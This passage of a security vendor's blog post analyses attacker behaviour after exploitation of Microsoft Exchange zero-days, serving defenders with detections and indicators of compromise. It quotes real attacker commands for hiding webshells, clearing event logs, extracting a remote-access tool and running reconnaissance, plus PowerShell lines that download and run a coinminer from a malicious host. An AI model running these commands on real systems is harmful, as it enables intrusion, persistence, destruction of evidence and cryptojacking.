<p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li><li>Attacker Technique - PowerShell Download Cradles</li></ul><h3 id="ten-character-webshell-attacker">Ten-character webshell attacker</h3><p>This attacker was seen uploading webshells, using icacls to set the directory permissions of the webroot to be read-only recursively. Additionally, the attacker would use the attrib.exe utility to set the file containing the webshell to be marked as hidden and system to make finding these more difficult.</p><pre><code>C:\Windows\System32\cmd.exe /c move "c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\error.aspx" "c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\<REDACTED_10_CHARACTER_STRING>.aspx" C:\Windows\System32\cmd.exe /c icacls "c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth" /inheritance:r /grant:r Everyone:(OI)(CI)R C:\Windows\System32\cmd.exe /c =attrib "c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\<REDACTED_10_CHARACTER_STRING>.aspx" +s +h attrib "c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\<REDACTED_10_CHARACTER_STRING>.aspx" +s +h C:\Windows\System32\cmd.exe /c icacls "c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth" /inheritance:r /grant:r Everyone:(OI)(CI)R </code></pre> <p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li><li>Attacker Technique - Modification Of Files In Exchange Webroot</li></ul><h3 id="7zip-and-netsupport-manager-attacker">7zip and NetSupport Manager attacker</h3><p>This attacker used the <a href="https://www.7-zip.org/">7zip</a> compression utility (renamed to MonitoringLog.exe) and the <a href="https://www.netsupportsoftware.com/remote-control/">NetSupport Manager</a> remote access tool (client32.exe). These utilities were most likely retrieved by the script1.ps1 PowerShell script and located within a password-protected archive named Service.Information.rtf. Once extracted, these utilities were executed:</p><pre><code>c:\windows\system32\cmd.exe dir C:\Programdata\ c:\windows\system32\cmd.exe /c powershell C:\Programdata\script1.ps1 powershell C:\Programdata\script1.ps1 C:\ProgramData\MonitoringLog.exe x -p<REDACTED_STRING> -y C:\ProgramData\Service.Information.rtf -oC:\ProgramData ping -n 10 127.0.0.1 c:\windows\system32\cmd.exe /c C:\Programdata\MonitoringLog.cmd taskkill /Im rundll32.exe /F C:\ProgramData\NetConnections\client32.exe ping -n 10 127.0.0.1 taskkill /Im rundll32.exe /F c:\windows\system32\cmd.exe /c tasklist /v tasklist /v </code></pre> <p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li></ul><h3 id="event-log-deletion-and-virtual-directory-creation-attacker">Event log deletion and virtual directory creation attacker</h3><p>This attacker created virtual directories within the existing webroot using the Microsoft utility <a href="https://docs.microsoft.com/en-us/iis/get-started/getting-started-with-iis/getting-started-with-appcmdexe">appcmd.exe</a>, and then cleared all event logs on the system using <a href="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil">wevtutl.exe</a>:</p><pre><code>CMD C:\Windows\System32\inetsrv\appcmd.exe add vdir "/app.name:Default Web Site/" "/path:/owa/auth/ /zfwqn" /physicalPath:C:\ProgramData\COM\zfwqn CMD /c for /f %x in ('wevtutil el') do wevtutil cl %x wevtutil el wevtutil cl <REDACTED_ALL_DIFFERENT_EVENT_LOGS> </code></pre> <p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li><li>Attacker Technique - Clearing Event Logs With WEvtUtil</li></ul><h3 id="webshell-enumeration-attacker">Webshell enumeration attacker</h3><p>This attacker was seen executing encoded PowerShell commands to use the <a href="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/type">type</a> command to view the contents possible webshell files named outlooken.aspx seen used by HAFNIUM and other attackers. This could be someone looking to use the footholds placed by other attackers or even researchers using the same exploit to identify systems that have been successfully compromised based on the reported activity associated with HAFNIUM:</p><pre><code>cmd /c powershell -enc YwBtAGQALgBlAHgAZQAgAC8AYwAgACIAdAB5AHAAZQAgACIAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAHgAYwBoAGEAbgBnAGUAIABTAGUAcgB2AGUAcgBcAFYAMQA1AFwARgByAG8AbgB0AEUAbgBkAFwASAB0AHQAcABQAHIAbwB4AHkAXABvAHcAYQBcAGEAdQB0AGgAXABvAHUAdABsAG8AbwBrAGUAbgAuAGEAcwBwAHgAIgAiACIA cmd /c powershell -enc dAB5AHAAZQAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwARQB4AGMAaABhAG4AZwBlACAAUwBlAHIAdgBlAHIAXABWADEANQBcAEYAcgBvAG4AdABFAG4AZABcAEgAdAB0AHAAUAByAG8AeAB5AFwAbwB3AGEAXABhAHUAdABoAFwAbwB1AHQAbABvAG8AawBlAG4ALgBhAHMAcAB4ACIA </code></pre> <p>Base64 decoded strings:</p><pre><code>type "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\outlooken.aspx" </code></pre> <p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li></ul><h3 id="coinminer-dropper-attacker">Coinminer dropper attacker</h3><p>Some attackers were seen using PowerShell to retrieve and execute coinminers.</p><pre><code>cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\windows\temp\dsf.exe & C:\windows\temp\dsf.exe RS9+cn_0 & del C:\windows\temp\dsf.exe powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\windows\temp\dsf.exe C:\windows\temp\dsf.exe RS9+cn_0 </code></pre> <p>And again with a slightly different filename to retrieved from:</p><pre><code>cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip -OutFile C:\windows\temp\dsf.exe & C:\windows\temp\dsf.exe RS9+cn_0 & del C:\windows\temp\dsf.exe powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip C:\windows\temp\dsf.exe RS9+cn_0 </code></pre> <p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li></ul><h3 id="simple-reconnaissance-attacker-s-">Simple reconnaissance attacker(s)</h3><p>Some attackers were seen performing extremely simple reconnaissance commands to gather more information about the host, processes, users, and systems within Active Directory:</p><pre><code>net group /domain net group "Domain Computers" /do net group "Domain Users" /do net group IntranetAdmins /do net user /domain systeminfo tasklist </code></pre> <p>Another example where only simple recon type commands were executed:</p><pre><code>whoami systeminfo systeminfo wmic product get name Wmic product get name </code></pre> <p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li></ul><h2 id="conclusions">Conclusions</h2><p>While there was widespread exploitation of these vulnerabilities in the wild, it does appear that this was the work of several different attackers with different motivations and skills. Rapid7 did even observe exploitation of the same victim by multiple different actors (HAFNIUM and coinminer drops) within a two-week timeframe. Several attackers used this vulnerability to gather passwords/hashes from victim systems en masse. This enabled them to gather data from several victims that would allow them access into various Active Directory services as long as those credentials gathered remain unchanged. </p><p>This dumping of credentials may have been done at this scale as the attackers were aware this activity would be discovered and the vulnerability would be patched very soon. This would potentially allow these attackers to continue to access these accounts even after the systems had been successfully patched. The level of escalation in use by HAFNIUM subsequent use by several other actors may point to the same exploit being shared or leaked. <strong>At the time of this writing, Rapid7 has no definitive evidence of this and acknowledges that this statement is speculative.</strong></p><p>By continuing to analyze the behavior of attackers post-compromise to develop detections, it can greatly increase the likelihood to be notified of a breach. This is regardless of the method used to obtain the initial access to the victim environment. Additionally, these detections have longer lifespans and can be made available in a more timely manner than most indicators of compromise are shared in other types of public reporting.</p><h3 id="observed-cves-employed-by-attackers-">Observed CVEs employed by attackers:<br></h3><table> <thead> <tr> <th>Common Vulnerabilities and Exposure</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>CVE-2018-18913</td> <td>Opera Search Order Hijacking Vulnerability <a href="https://blog.lucideus.com/2019/02/opera-search-order-hijacking-cve-2018-18913.html">https://blog.lucideus.com/2019/02/opera-search-order-hijacking-cve-2018-18913.html</a></td> </tr> <tr> <td>CVE-2021-26855</td> <td>Microsoft Exchange Server remote code execution <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855">https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855</a></td> </tr> <tr> <td>CVE-2021-26857</td> <td>Microsoft Exchange Server remote code execution <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857">https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857</a></td> </tr> <tr> <td>CVE-2021-26858</td> <td>Microsoft Exchange Server remote code execution <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858">https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858</a></td> </tr> <tr> <td>CVE-2021-27065</td> <td>Microsoft Exchange Server remote code execution <a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065">https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065</a></td> </tr> </tbody> </table> <h3 id="observed-iocs-employed-by-all-attackers-">Observed IOCs employed by all attackers:</h3><table> <thead> <tr> <th>Type</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>FQDN</td> <td>estonine.com</td> </tr> <tr> <td>FQDN</td> <td>p.estonine.com</td> </tr> <tr> <td>FQDN</td> <td>ipinfo.io</td> </tr> <tr> <td>Filepath</td> <td>C:\inetpub\wwwroot\aspnet_client\</td> </tr> <tr> <td>Filepath</td> <td>C:\inetpub\wwwroot\aspnet_client\system_web\</td> </tr> <tr> <td>Filepath</td> <td>C:\Program Files\Microsoft\Exchange Server\V15\Bin\</td> </tr> <tr> <td>Filepath</td> <td>c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\</td> </tr> <tr> <td>Filepath</td> <td>C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\</td> </tr> <tr> <td>Filepath</td> <td>C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\</td> </tr> <tr> <td>Filepath</td> <td>C:\Programdata\</td> </tr> <tr> <td>Filepath</td> <td>C:\ProgramData\COM\zfwqn\</td> </tr> <tr> <td>Filepath</td> <td>C:\root\</td> </tr> <tr> <td>Filepath</td> <td>C:\Users\Public\</td> </tr> <tr> <td>Filepath</td> <td>C:\Users\Public\Opera\</td> </tr> <tr> <td>Filepath</td> <td>C:\Windows\temp\</td> </tr> <tr> <td>Filename</td> <td>1.txt</td> </tr> <tr> <td>Filename</td> <td>2.bat</td> </tr> <tr> <td>Filename</td> <td>3.avi</td> </tr> <tr> <td>Filename</td> <td>b.log</td> </tr> <tr> <td>Filename</td> <td>c103w-at.zip</td> </tr> <tr> <td>Filename</td> <td>client32.exe</td> </tr> <tr> <td>Filename</td> <td>code</td> </tr> <tr> <td>Filename</td> <td>curl.exe</td> </tr> <tr> <td>Filename</td> <td>demo.dll</td> </tr> <tr> <td>Filename</td> <td>discover.aspx</td> </tr> <tr> <td>Filename</td> <td>dsf.exe</td> </tr> <tr> <td>Filename</td> <td>error.aspx</td> </tr> <tr> <td>Filename</td> <td>ErrorFF.aspx</td> </tr> <tr> <td>Filename</td> <td>exshell.psc1</td> </tr> <tr> <td>Filename</td> <td>Flogon.aspx</td> </tr> <tr> <td>Filename</td> <td>lsass.dump</td> </tr> <tr> <td>Filename</td> <td>m103w.zip</td> </tr> <tr> <td>Filename</td> <td>nvidia.msi</td> </tr> <tr> <td>Filename</td> <td>opera_browser.dll</td> </tr> <tr> <td>Filename</td> <td>opera_browser.exe</td> </tr> <tr> <td>Filename</td> <td>opera_browser.png</td> </tr> <tr> <td>Filename</td> <td>OutlookEN.aspx</td> </tr> <tr> <td>Filename</td> <td>MonitoringLog.cmd</td> </tr> <tr> <td>Filename</td> <td>MonitoringLog.exe</td> </tr> <tr> <td>Filename</td> <td>p</td> </tr> <tr> <td>Filename</td> <td>procdump64.exe</td> </tr> <tr> <td>Filename</td> <td>Service.Information.rtf</td> </tr> <tr> <td>Filename</td> <td>TimeoutLogout.aspx</td> </tr> <tr> <td>Filename</td> <td>2.bat</td> </tr> <tr> <td>Filename</td> <td>script1.ps1</td> </tr> <tr> <td>Filename</td> <td>test.bat</td> </tr> <tr> <td>IP Address</td> <td>178.162.217.107</td> </tr> <tr> <td>IP Address</td> <td>178.162.203.202</td> </tr> <tr> <td>IP Address</td> <td>178.162.203.226</td> </tr> <tr> <td>IP Address</td> <td>85.17.31.122</td> </tr> <tr> <td>IP Address</td> <td>5.79.71.205</td> </tr> <tr> <td>IP Address</td> <td>5.79.71.225</td> </tr> <tr> <td>IP Address</td> <td>178.162.203.211</td> </tr> <tr> <td>IP Address</td> <td>85.17.31.82</td> </tr> <tr> <td>IP Address</td> <td>86.105.18.116</td> </tr> <tr> <td>IP Address</td> <td>198.98.61.152</td> </tr> <tr> <td>IP Address</td> <td>89.34.111.11</td> </tr> <tr> <td>MD5</td> <td>7a6c605af4b85954f62f35d648d532bf</td> </tr> <tr> <td>MD5</td> <td>e1ae154461096adb5ec602faad42b72e</td> </tr> <tr> <td>MD5</td> <td>b3df7f5a9e36f01d0eb0043b698a6c06</td> </tr> <tr> <td>MD5</td> <td>c60ac6a6e6e582ab0ecb1fdbd607705b</td> </tr> <tr> <td>MD5</td> <td>42badc1d2f03a8b1e4875740d3d49336</td> </tr> <tr> <td>MD5</td> <td>c515107d75563890020e915f54f3e036</td> </tr> <tr> <td>SHA1</td> <td>02886f9daa13f7d9855855048c54f1d6b1231b0a</td> </tr> <tr> <td>SHA1</td> <td>c7f68a184df65e72c59403fb135924334f8c0ebd</td> </tr> <tr> <td>SHA1</td> <td>ab32d4ec424b7cd30c7ace1dad859df1a65aa50e</td> </tr> <tr> <td>SHA1</td> <td>ba9de479beb82fd97bbdfbc04ef22e08224724ba</td> </tr> <tr> <td>SHA1</td> <td>cee178da1fb05f99af7a3547093122893bd1eb46</td> </tr> <tr> <td>SHA1</td> <td>2fed891610b9a770e396ced4ef3b0b6c55177305</td> </tr> <tr> <td>SHA-256</td> <td>b212655aeb4700f247070ba5ca6d9c742793f108881d07e4d1cdc4ede175fcff</td> </tr> <tr> <td>SHA-256</td> <td>d740136b37f894d76a7d4dedbe1ae51ed680c964bcb61e7c4ffe7d0e8b20ea09</td> </tr> <tr> <td>SHA-256</td> <td>bd79027605c0856e7252ed84f1b4f934863b400081c449f9711446ed0bb969e6</td> </tr> <tr> <td>SHA-256</td> <td>4d24b359176389301c14a92607b5c26b8490c41e7e3a2abbc87510d1376f4a87</td> </tr> <tr> <td>SHA-256</td> <td>c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf</td> </tr> <tr> <td>SHA-256</td> <td>076d3ec587fc14d1ff76d4ca792274d1e684e0f09018b33da04fb1d5947a7d26</td> </tr> <tr> <td>URL</td> <td><code>http://103.212.223.210:9900/nvidia.msi</code></td> </tr> <tr> <td>URL</td> <td><code>http://86.105.18.116/news/code</code></td> </tr> <tr> <td>URL</td> <td><code>http://86.105.18.116/news/opera_browser.dll</code></td> </tr> <tr> <td>URL</td> <td><code>http://86.105.18.116/news/opera_browser.exe</code></td> </tr> <tr> <td>URL</td> <td><code>http://86.105.18.116/news/opera_browser.png</code></td> </tr> <tr> <td>URL</td> <td><code> http://89.34.111.11/3.avi</code></td> </tr> <tr> <td>URL</td> <td><code>http://microsoftsoftwaredownload.com:8080/c103w-at.zip</code></td> </tr> <tr> <td>URL</td> <td><code>http://microsoftsoftwaredownload.com:8080/m103w.zip</code></td> </tr> <tr> <td>URL</td> <td><code>http://p.estonine.com/p?e</code></td> </tr> <tr> <td>URL</td> <td>http://<REDACTED_HOSTNAME>/owa/auth/ /zfwqn</td> </tr> <tr> <td>URL</td> <td>http://<REDACTED_HOSTNAME>/owa/auth/%20/zfwqn</td> </tr> </tbody> </table> <h3 id="references-">References:</h3><ul><li><a href="https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/">https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/</a></li><li><a href="https://aka.ms/ExchangeVulns">https://aka.ms/ExchangeVulns</a></li><li><a href="https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/">https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/</a></li><li><a href="https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html">https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html</a></li><li><a href="https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html">https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html</a></li><li><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf</a></li></ul><div style="border: 1px solid #ccc; padding: 15px 20px 0;border-radius: 3px;text-align: center;"> <h4 style="vertical-align: middle;margin-bottom: 10px;">NEVER MISS A BLOG</h4> <p>Get the latest stories, expertise, and news about security today.</p> <a class="subscribe-btn button smBtn blue">Subscribe</a> </div> <br> <p><br></p> </div> </div> <div class="grid-y post-bottom-info__wrapper"> <div class="cell-padding"> <div class="post-bottom-info" id="post-bottom-info"> <div class="grid-x"> <div class="medium-12 large-6 cell text-center large-text-left smpad-btm"> <h4>POST TAGS</h4> <div class="tag-row wrapper-item"> <div class="blog-resources__tags"> <ul> <li> <a href="/blog/tag/zero-day/" title="Zero-Day">Zero-Day</a> </li> <li> <a href="/blog/tag/microsoft-vulnerability/" title="Microsoft">Microsoft</a> </li> <li> <a href="/blog/tag/detection-and-response/" title="Detection and Response">Detection and Response</a> </li> <li> <a href="/blog/tag/insightidr/" title="InsightIDR">InsightIDR</a> </li> <li> <a href="/blog/tag/mdr-managed-detection-response/" title="Managed Detection and Response (MDR)">Managed Detection and Response (MDR)</a> </li> </ul> </div> </div> <h4>SHARING IS CARING</h4> <ul class="blog-post-social"> <li> <a href="https://www.linkedin.com/shareArticle?mini=true&url=https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/&title=Defending+Against+the+Zero+Day%3a+Analyzing+Attacker+Behavior+Post-Exploitation+of+Microsoft+Exchange&summary=In+recent+weeks%2c+there+has+been+quite+a+lot+of+reporting+on+the+exploitation+of+the+latest+disclosed+vulnerabilities+in+Microsoft%e2%80%99s+Exchange+Server+by+an+attacker+referred+to+as+HAFNIUM." onclick="window.open(this.href, 'linkedin-share', 'width=520,height=570');return false;" class="linkedin"></a> </li> <li> <a href="https://twitter.com/intent/tweet?text=Defending+Against+the+Zero+Day%3a+Analyzing+Attacker+Behavior+Post-Exploitation+of+Microsoft+Exchange&url=https%3a%2f%2fwww.rapid7.com%2fblog%2fpost%2f2021%2f03%2f23%2fdefending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange%2f" onclick="window.open(this.href, 'twitter-share', 'width=550,height=235');return false;" class="twitter-x"></a> </li> <li> <a href="https://www.facebook.com/sharer/sharer.php?u=https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/" onclick="window.open(this.href, 'facebook-share','width=580,height=296');return false;" class="facebook"></a> </li> </ul> </div> <div class="cell medium-12 large-6 end"> <div class="author-box text-center large-text-left"> <div class="content"> <div class="column-left"> <h4>AUTHOR</h4> </div> <div class="column-right"> <a href="/blog/author/eoin/" class="post-author" data-bg="https://blog.rapid7.com/assets/images/default-author-image.png"> </a> </div> <a class="name" href="/blog/author/eoin/" title="Eoin Miller"> Eoin Miller </a> </div> <p> </p> <a href="/blog/author/eoin/" class=" button smBtn clear">View Eoin's Posts</a> </div> </div> </div> </div> </div> </div> </div> <div class="small-12 medium-4 large-3 cell blog-single-post__right-column medium-order-1 small-order-2"> <div class="blog-post-img hide-for-small-only"> <img loading="lazy" src="https://blog.rapid7.com/content/images/2021/03/zero-day.jpg" alt=""> </div> <section class="blog-resources"> <div class="blog-resources__topics"> <div class="text-center large-text-left blog-resources__heading"> <h2>Topics</h2> </div> <ul> <li class="text-center medium-text-left"> <a href="/blog/tag/metasploit/"> Metasploit  <i>(657)</i> </a> </li> <li class="text-center medium-text-left"> <a href="/blog/tag/vulnerability-management/"> Vulnerability Management  <i>(362)</i> </a> </li> <li class="text-center medium-text-left"> <a href="/blog/tag/research/"> Research  <i>(240)</i> </a> </li> <li class="text-center medium-text-left"> <a href="/blog/tag/detection-and-response/"> Detection and Response  <i>(205)</i> </a> </li> <li class="text-center medium-text-left"> <a href="/blog/tag/vulnerability-disclosure/"> Vulnerability Disclosure  <i>(149)</i> </a> </li> <li class="text-center medium-text-left"> <a href="/blog/tag/emergent-threat-response/"> Emergent Threat Response  <i>(142)</i> </a> </li> <li class="text-center medium-text-left"> <a href="/blog/tag/cloud-security/"> Cloud Security  <i>(136)</i> </a> </li> <li class="text-center medium-text-left"> <a href="/blog/tag/secops/"> Security Operations  <i>(21)</i> </a> </li> </ul> </div> <div class="blog-resources__tags"> <div class="text-center large-text-left blog-resources__heading"> <h2>Popular Tags</h2> </div> <div class="search"> <div class="search-wrapper"> <input class="search-input" placeholder="Search Tags" disabled> <i class="r7-icon r7-icon-search-magnify"></i> </div> </div> <div class="blog-resources__tags-no-search"> <ul class="text-center medium-text-left large-text-left"> <li><a href="/blog/tag/metasploit/">Metasploit</a></li> <li><a href="/blog/tag/metasploit-weekly-wrapup/">Metasploit Weekly Wrapup</a></li> <li><a href="/blog/tag/vulnerability-management/">Vulnerability Management</a></li> <li><a href="/blog/tag/research/">Research</a></li> <li><a href="/blog/tag/logentries/">Logentries</a></li> <li><a href="/blog/tag/detection-and-response/">Detection and Response</a></li> </ul> </div> <div class="blog-resources__tags-search hide"></div> </div> </section> <section class="blog-related-posts hide-for-small-only"> <div class="text-center large-text-left blog-resources__heading"> <h2>Related Posts</h2> </div> <div class="blog-related-posts__wrapper"> <div class="blog-related-posts__wrapper--item"> <p class="left"> New IDR Log Search Enhancements: Accelerate, Streamline, and Simplify Investigations </p> <p class="right"><a href="/blog/post/2024/11/15/new-idr-log-search-enhancements-accelerate-streamline-and-simplify-investigations/">Read More</a></p> </div> <div class="blog-related-posts__wrapper--item"> <p class="left"> Investigating a SharePoint Compromise: IR Tales from the Field </p> <p class="right"><a href="/blog/post/2024/10/30/investigating-a-sharepoint-compromise-ir-tales-from-the-field/">Read More</a></p> </div> <div class="blog-related-posts__wrapper--item"> <p class="left"> Fortinet FortiManager CVE-2024-47575 Exploited in Zero-Day Attacks </p> <p class="right"><a href="/blog/post/2024/10/23/etr-fortinet-fortimanager-cve-2024-47575-exploited-in-zero-day-attacks/">Read More</a></p> </div> <div class="blog-related-posts__wrapper--item"> <p class="left"> What’s New in Rapid7 Products & Services: Q3 2024 in Review </p> <p class="right"><a href="/blog/post/2024/10/01/whats-new-in-rapid7-products-services-q3-2024-in-review/">Read More</a></p> </div> </div> </section> </div> <div class="medium-10 medium-offset-1 cell small-12 medium-order-2 small-order-1"> <section class="blog-featured-posts"> <div class="grid-container blog-section-wrapper"> <div class="grid-x grid-padding-x"> <div class="text-center large-text-left blog-featured-posts__heading"> <h2>Related Posts</h2> </div> <div class="grid-x grid-padding-y grid-padding-x--sm"> <div class="small-12 medium-6 large-3 cell blog-featured-posts__wrapper"> <div class="blog-featured-posts__wrapper--item" data-bg="https://blog.rapid7.com/content/images/2024/11/GettyImages-1479352738.jpg"> <a href="/blog/post/2024/11/15/new-idr-log-search-enhancements-accelerate-streamline-and-simplify-investigations/" class="slide" role="button" aria-label="New IDR Log Search Enhancements: Accelerate, Streamline, and Simplify Investigations"> <div class="top-banner"> </div> <div class="slide__content"> <div class="slide__content--title"> <span class="topic">InsightIDR</span> </div> <div class="slide__content--headline"> New IDR Log Search Enhancements: Accelerate, Streamline, and Simplify Investigations </div> <div class="view-more"> <span class="button btn-secondary smBtn">Read Full Post</span> </div> </div> </a> </div> </div> <div class="small-12 medium-6 large-3 cell blog-featured-posts__wrapper"> <div class="blog-featured-posts__wrapper--item" data-bg="https://blog.rapid7.com/content/images/2024/10/GettyImages-1422990988.jpg"> <a href="/blog/post/2024/10/30/investigating-a-sharepoint-compromise-ir-tales-from-the-field/" class="slide" role="button" aria-label="Investigating a SharePoint Compromise: IR Tales from the Field"> <div class="top-banner"> </div> <div class="slide__content"> <div class="slide__content--title"> <span class="topic">Incident Response</span> </div> <div class="slide__content--headline"> Investigating a SharePoint Compromise: IR Tales from the Field </div> <div class="view-more"> <span class="button btn-secondary smBtn">Read Full Post</span> </div> </div> </a> </div> </div> <div class="small-12 medium-6 large-3 cell blog-featured-posts__wrapper"> <div class="blog-featured-posts__wrapper--item" data-bg="https://blog.rapid7.com/content/images/2024/10/emergent-threat-banner-1.jpeg"> <a href="/blog/post/2024/10/23/etr-fortinet-fortimanager-cve-2024-47575-exploited-in-zero-day-attacks/" class="slide" role="button" aria-label="Fortinet FortiManager CVE-2024-47575 Exploited in Zero-Day Attacks"> <div class="top-banner"> </div> <div class="slide__content"> <div class="slide__content--title"> <span class="topic">Emergent Threat Response</span> </div> <div class="slide__content--headline"> Fortinet FortiManager CVE-2024-47575 Exploited in Zero-Day Attacks </div> <div class="view-more"> <span class="button btn-secondary smBtn">Read Full Post</span> </div> </div> </a> </div> </div> <div class="small-12 medium-6 large-3 cell blog-featured-posts__wrapper"> <div class="blog-featured-posts__wrapper--item" data-bg="https://blog.rapid7.com/content/images/2024/09/GettyImages-1805661754.jpg"> <a href="/blog/post/2024/10/01/whats-new-in-rapid7-products-services-q3-2024-in-review/" class="slide" role="button" aria-label="What’s New in Rapid7 Products & Services: Q3 2024 in Review"> <div class="top-banner"> </div> <div class="slide__content"> <div class="slide__content--title"> <span class="topic">Product Updates</span> </div> <div class="slide__content--headline"> What’s New in Rapid7 Products & Services: Q3 2024 in Review </div> <div class="view-more"> <span class="button btn-secondary smBtn">Read Full Post</span> </div> </div> </a> </div> </div> </div> </div> <div class="cell text-center"> <a class="button mdBtn btn-secondary" href="/blog/posts/">View All Posts</a> </div> </div> </section> </div> </div> </div> </section> </div> <footer > <section class="search-scroll"> <div class="grid-container"> <div class="grid-x grid-padding-x"> <div class="medium-5 medium-offset-1 cell footer__search"> <form action="/search/"> <label for="search" class="sr-only">Search</label> <input class="sb-search-input" placeholder="Search all the things" type="search" value="" name="q" id="search"> <input class="sb-search-submit" type="submit" value="Submit Search" alt="Search all the things"> </form> </div> <div class="medium-5 cell footer__scroll"> <a href="#__" class="smooth"> <span>BACK TO TOP</span> <picture><source sizes="(max-width: 480px) 100vw, (max-width: 640px) 95vw, (max-width: 1024px) 95vw, 90vw" srcset="/includes/img/up-arrow-lightgray.png?format=webp&width=1200&quality=90 1200w, /includes/img/up-arrow-lightgray.png?format=webp&width=1024&quality=90 1024w, /includes/img/up-arrow-lightgray.png?format=webp&width=640&quality=90 640w, /includes/img/up-arrow-lightgray.png?format=webp&width=480&quality=90 480w" type="image/webp" /><source sizes="(max-width: 480px) 100vw, (max-width: 640px) 95vw, (max-width: 1024px) 95vw, 90vw" srcset="/includes/img/up-arrow-lightgray.png?width=1200 1200w, /includes/img/up-arrow-lightgray.png?width=1024 1024w, /includes/img/up-arrow-lightgray.png?width=640 640w, /includes/img/up-arrow-lightgray.png?width=480 480w" /><img alt="" decoding="async" loading="lazy" src="/includes/img/up-arrow-lightgray.png?width=1200" /></picture> </a> </div> </div> </div> </section> <div class="grid-container"> <section class="footer__links grid-x grid-padding-x"> <div class="medium-10 medium-offset-1 cell footer__links-wrapper"> <div class="footer__links-col"> <div class="footer__links-section footer__contact"> <a href="/"> <picture><source sizes="(max-width: 480px) 100vw, (max-width: 640px) 95vw, (max-width: 1024px) 95vw, 90vw" srcset="/includes/img/Rapid7_logo.svg?format=webp&width=1200&quality=90 1200w, /includes/img/Rapid7_logo.svg?format=webp&width=1024&quality=90 1024w, /includes/img/Rapid7_logo.svg?format=webp&width=640&quality=90 640w, /includes/img/Rapid7_logo.svg?format=webp&width=480&quality=90 480w" type="image/webp" /><source sizes="(max-width: 480px) 100vw, (max-width: 640px) 95vw, (max-width: 1024px) 95vw, 90vw" srcset="/includes/img/Rapid7_logo.svg?width=1200&quality=90 1200w, /includes/img/Rapid7_logo.svg?width=1024&quality=90 1024w, /includes/img/Rapid7_logo.svg?width=640&quality=90 640w, /includes/img/Rapid7_logo.svg?width=480&quality=90 480w" /><img alt="Rapid7 logo" class="logo" decoding="async" loading="lazy" src="/includes/img/Rapid7_logo.svg?width=1200&quality=90" /></picture> </a> <div class="footer__links-title">CUSTOMER SUPPORT</div> <a class="link" href="tel:1-866-390-8113">+1-866-390-8113 (Toll Free)</a> <div class="footer__links-title">SALES SUPPORT</div> 